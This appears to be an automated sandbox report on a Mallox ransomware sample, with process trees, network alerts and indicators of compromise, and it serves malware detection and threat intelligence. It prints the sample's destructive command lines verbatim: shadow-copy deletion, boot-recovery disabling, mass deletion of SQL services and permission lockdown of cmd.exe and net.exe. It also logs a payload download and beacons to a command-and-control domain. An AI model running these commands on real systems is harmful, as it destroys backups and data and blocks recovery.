Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | July 27, 2023, 11:43 a.m. | July 27, 2023, 11:45 a.m. |
-
-
-
reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
2744 -
takeown.exe takeown /f C:\Windows\system32\cmd.exe /a
2804 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3000 -
cacls.exe cacls C:\Windows\system32\cmd.exe /g Administrators:f
1488 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
524 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Users:r
2272 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2120 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
2180 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2980 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d SERVICE
2844 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2084 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
2336 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2580 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d "network service"
792 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2148 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g system:r
2128 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3060 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
3048 -
takeown.exe takeown /f C:\Windows\SysWOW64\cmd.exe /a
2532 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2636 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
2652 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2172 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
2808 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2348 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
2780 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1340 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
2240 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2632 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
2700 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1808 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
2560 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2588 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
316 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3084 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3120 -
takeown.exe takeown /f C:\Windows\system32\net.exe /a
3176 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3228 -
cacls.exe cacls C:\Windows\system32\net.exe /g Administrators:f
3264 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3320 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Users:r
3356 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3412 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Administrators:r
3448 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3504 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d SERVICE
3540 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3596 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssqlserver
3632 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3688 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d "network service"
3724 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3784 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d system
3820 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3876 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3912 -
takeown.exe takeown /f C:\Windows\SysWOW64\net.exe /a
3968 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4012 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
4048 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2584 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3140 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3224 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3280 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3376 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
3360 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3452 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3564 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3648 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3636 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1476 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d system
3776 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3868 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3936 -
takeown.exe takeown /f C:\Windows\system32\net1.exe /a
4008 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4092 -
cacls.exe cacls C:\Windows\system32\net1.exe /g Administrators:f
3088 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3260 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Users:r
3348 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3492 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3592 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3744 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d SERVICE
2260 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3796 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3960 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4016 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d "network service"
3192 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3404 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d system
3532 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3680 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3844 -
takeown.exe takeown /f C:\Windows\SysWOW64\net1.exe /a
4000 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3112 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3352 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1780 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
3780 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3248 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3516 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3100 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3772 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3240 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
3864 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4136 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
4172 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4232 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d system
4268
-
-
-
vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
2920 -
cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
2940 -
cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
2948-
sc.exe sc delete "MSSQLFDLauncher"
1028
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
948
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
whyers.io | 172.67.191.103 | |
api.ipify.org |
CNAME
api4.ipify.org
|
104.237.62.211 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49161 -> 80.66.75.37:80 | 2027265 | ET INFO Dotted Quad Host PDF Request | Potentially Bad Traffic |
UDP 192.168.56.103:50800 -> 8.8.8.8:53 | 2046826 | ET MALWARE Mallox Ransomware CnC Domain (whyers .io) in DNS Lookup | A Network Trojan was detected |
TCP 192.168.56.103:49197 -> 104.237.62.211:80 | 2021997 | ET POLICY External IP Lookup api.ipify.org | Device Retrieving External IP Address Detected |
TCP 192.168.56.103:49201 -> 104.21.76.77:443 | 2046827 | ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI | A Network Trojan was detected |
TCP 192.168.56.103:49201 -> 104.21.76.77:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49201 104.21.76.77:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=whyers.io | b5:70:31:dc:b0:cd:7d:e9:af:71:21:ec:4b:e6:97:ce:e4:da:a6:57 |
file | C:\Program Files\Mozilla Firefox\browser\VisualElements\FILE RECOVERY.txt |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://80.66.75.37/Gqfnqspsx.pdf | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://api.ipify.org/ | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://whyers.io/QWEwqdsvsf/ap.php |
request | GET http://80.66.75.37/Gqfnqspsx.pdf |
request | GET http://api.ipify.org/ |
request | POST https://whyers.io/QWEwqdsvsf/ap.php |
request | POST https://whyers.io/QWEwqdsvsf/ap.php |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Preferences |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\History |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3 |
domain | api.ipify.org |
file | C:\Users\test22\AppData\Local\Temp\Kill-Delete.bat |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\cmd.exe /g Administrators:f |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service" |
cmdline | takeown /f C:\Windows\system32\cmd.exe /a |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g Administrators:r |
cmdline | cmd.exe /c bcdedit /set {current} recoveryenabled no |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g system:r |
cmdline | cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d SERVICE |
cmdline | takeown /f C:\Windows\SysWOW64\cmd.exe /a |
cmdline | cmd.exe /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress |
cmdline | "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d "network service" |
cmdline | "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
url | https://www.torproject.org/download/ |
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE |
cmdline | takeown /f C:\Windows\SysWOW64\net.exe /a |
cmdline | cacls C:\Windows\system32\net.exe /e /d system |
cmdline | cacls C:\Windows\system32\net.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\net.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver |
cmdline | sc delete "MSSQLFDLauncher" |
cmdline | cacls C:\Windows\system32\net.exe /e /g Users:r |
cmdline | cacls C:\Windows\SysWOW64\net.exe /g Administrators:f |
cmdline | takeown /f C:\Windows\system32\net.exe /a |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\system32\net.exe /g Administrators:f |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress |
cmdline | cmd.exe /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe |
cmdline | cacls C:\Windows\system32\net.exe /e /d SERVICE |
cmdline | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress |
